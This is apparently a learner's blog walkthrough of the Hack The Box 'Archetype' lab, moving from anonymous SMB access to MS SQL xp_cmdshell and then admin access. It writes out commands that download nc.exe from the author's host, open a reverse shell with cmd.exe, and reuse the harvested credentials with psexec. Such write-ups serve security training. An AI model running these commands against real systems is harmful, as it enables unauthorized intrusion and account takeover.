Box 1: HTB - Archetype
Normally, I used Nmap to begin my port scanning and reconnaisance. For explanation about nmap syntax and its parameter, visit this site: https://explainshell.com/
nmap -sV -n -vv -Pn -T4 -p- -A 10.10.10.27 --open
PORT STATE SERVICE REASON VERSION135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn445/tcp open microsoft-ds syn-ack ttl 127 Windows Server 2019 Standard 17763 microsoft-ds1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2017 14.00.1000.00; RTM5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC49669/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPCsmb-os-discovery:| OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)| Computer name: Archetype| NetBIOS computer name: ARCHETYPE\x00| Workgroup: WORKGROUP\x00
Oh, let me check what we found:
- 5985 & 47001 are ports for HTTP service, however they’re API. I try get accessing via browser, but unsuccessfully. I’ve also tried web directory enumerating with dirsearch, dirb but there’s nothing left there.
- Dynamic ports (from 49664–49669) are high port numbers, i was gonna ignore them, though still research for some clue. Found this, many services rely on the Remote Procedure Call (RPC) or DCOM features in Microsoft Windows to assign them dynamic TCP ports. Specifically, these are local ports, used by Task Scheduler, Spooler, Eventlog, Skype. You can’t disable these unless you stop the processes listening on these ports. Check this.
Nevertheless, I identified ports I thought were interesting, such as 139, 445 and 1433
- Port 139: SMB originally ran on top of NetBIOS using port 139. NetBIOS is an older transport layer that allows Windows computers to talk to each other on the same network.
- Port 445: Later versions of SMB (after Windows 2000) began to use port 445 on top of a TCP stack. Using TCP allows SMB to work over the Internet.
- Port 1433: Microsoft’s SQL Server, including the desktop editions that are often silently installed with other Microsoft applications, opens and services queries delivered over incoming TCP connections through this port.
Next, It is worth checking to see whether anonymous access has been permitted, as file shares often store configuration files containing passwords or other sensitive information. We can use smbclient to list available shares, try no username + no password with option
-L to get a list of shares available on a host, option
--no-pass to ask for no password.
smbclient -L -N //10.10.10.27
Great, there are two available shares with read access:
- IPC$: this hidden share is a special share used for inter-process communication. It doesn’t allow one to access files or directories like other shares, but rather allows one to communicate with processes running on the remote system.
- backups: a normal share with read access. It lacks a comment which means it could contain interesting data if we’re able to connect to it.
As usual, “backups” is an interesting folder to start with, let’s attempt to access it and see what’s inside. Use below command:
smbclient -N //10.10.10.27/backups
help to list all commands we can use here. Then, let’s use
dir to list all things contained in here. Yup, this directory contained an interesting file called “prod.dtsConfig”. You couldn’t use
type here to view content of this file. Therefore, I used
get <file name>command to download the file to my local machine which I could then open using
Haha, two helpful pieces of information were User ID and Password, and I’m sure with you that they’re used to access MS SQL service. Now, we need some SQL client tool to access SQL database, such as SSMS on Windows machines, though I’m using Kali.
After searching on Google, a lot of pentester recommend using a script called “mssqlclient.py” in Impacket tool suite which is installed on Kali. The first step, move to directory of Impacket tools. After that, use to script to login MS SQL database:
python3 mssqlclient.py ARCHETYPEfirstname.lastname@example.org -windows-auth
-h | --help : Show usage and all optional arguments
-windows-auth : whether or not to use Windows Authentication (default False)
After successful login, we can use the IS_SRVROLEMEMBER function to reveal whether the current SQL user has sysadmin (highest level) privileges on the SQL Server. This is successful, and we do indeed have sysadmin privileges. Syntax:
The result returned is 1 and it indicate that we have sysadmin role. This will allow us to enable xp_cmdshell and gain RCE on the host. Check
help to show something we can do here.
As you see, we can use
enable_xp_cmdshell to enable xp_cmdshell and go ahead. Instead, we have another way to deal with this. Let’s attempt this, by inputting the commands below:
SQL> EXEC sp_configure 'show advanced options', 1
SQL> EXEC sp_configure 'xp_cmdshell', 1
SQL> xp_cmdshell "whoami"
Great, so we now know that we are a sysadmin and that we can execute commands. Next thing I did is try to spawn a reverse-shell connection to my Kali machine. After a bit of research, I found out that one way to execute the reverse-shell is to host a file containing the reverse shell script somewhere locally on my Kali and then request the SQL server to connect to my Kali machine, download that script and execute it.
I decide to use this familiar tool to connect SQL server back to my Kali: Netcat. So turn off your anti-virus software temporarily and download it here.
Let’s host this nc.exe somewhere on your Kali. Next, change current directory to the directory containing file nc.exe. Setup your web server to host this file on port 80 (HTTP):
python -m SimpleHTTPServer 80
Get back to SQL server, try using this command to download nc.exe from my Kali web server. Note that 10.10.14.113 is my Kali IP address.
xp_cmdshell "powershell wget http://10.10.14.113:80/nc.exe"
Try again with these below options, remember to define output for easy locating on your Kali:
xp_cmdshell "powershell wget -UseBasicParsing http://10.10.14.113:80/nc.exe -OutFile %temp%/nc.exe"
Note: Here, %temp% will be equal to C:\Users\sql_svc\AppData\Local\Temp\nc.exe
After that, in another window we spawn a Netcat listener listening on port 443:
nc -lvnp 443
At last, let’s bomb our executable file “nc.exe” which will connect to our Netcat Listener. More about Netcat syntax, please check this.
xp_cmdshell "%temp%/nc.exe -nv 10.10.14.113 443 -e cmd.exe"
We’ve logged in to SQL server CMD successfully, ashell is received as sql_svc account. Check this user’s Desktop and you will see user.txt which contains the flag.
Well, now that we got the user’s flag, we need to get the administrator flag too. There was only one problem, I had no idea where to go next, so I had to research Windows privilege escalation techniques. Here I stumbled upon a very helpful checklist.
systeminfo command didn’t help much apart identifying the OS version to “Microsoft Windows Server 2019 Standard”.
Next, I checked the environment variables following the checklist with
SET command but nothing new or interesting was found.
PowerShell history was next on the checklist. I first needed to find the path where it could be found and after a short Googling, I found a useful article. The location of the file could be identified using the Get-PSReadlineOption command and looking for the HistorySavePath key.
The located path is:
Let’s check what does “net.exe use” command do by looking at the documentation. The net use command is a Command Prompt command that’s used to connect to, remove, and configure connections to shared resources, like mapping drives and network printers. So this command maps
\\Archetype\backupsshared resource to a new drive called “
T:” with credentials needed for connecting to it -
Now that we need to find a way to connect to the machine as that user with something similar as SSH. Here is a list of tools I found that could help with the situation. The next tool in line was psexec.py script from Impacket library. Documentation about the original PsExec from Sysinternals can be found here. This tool allows us to connect to a remote windows host, and by combining it with credentials we gathered, we can now connect to the host and gain admin access.
After gaining admin access, we simply traverse to Administrator’s desktop and read the root flag (I wouldn’t disclose it).
Finally, this is my 1st story on Medium, also the 1st box on journey to pursue OSCP exam. I’ll try to complement the details when possible.
THANKS FOR READING AND SUPPORTING!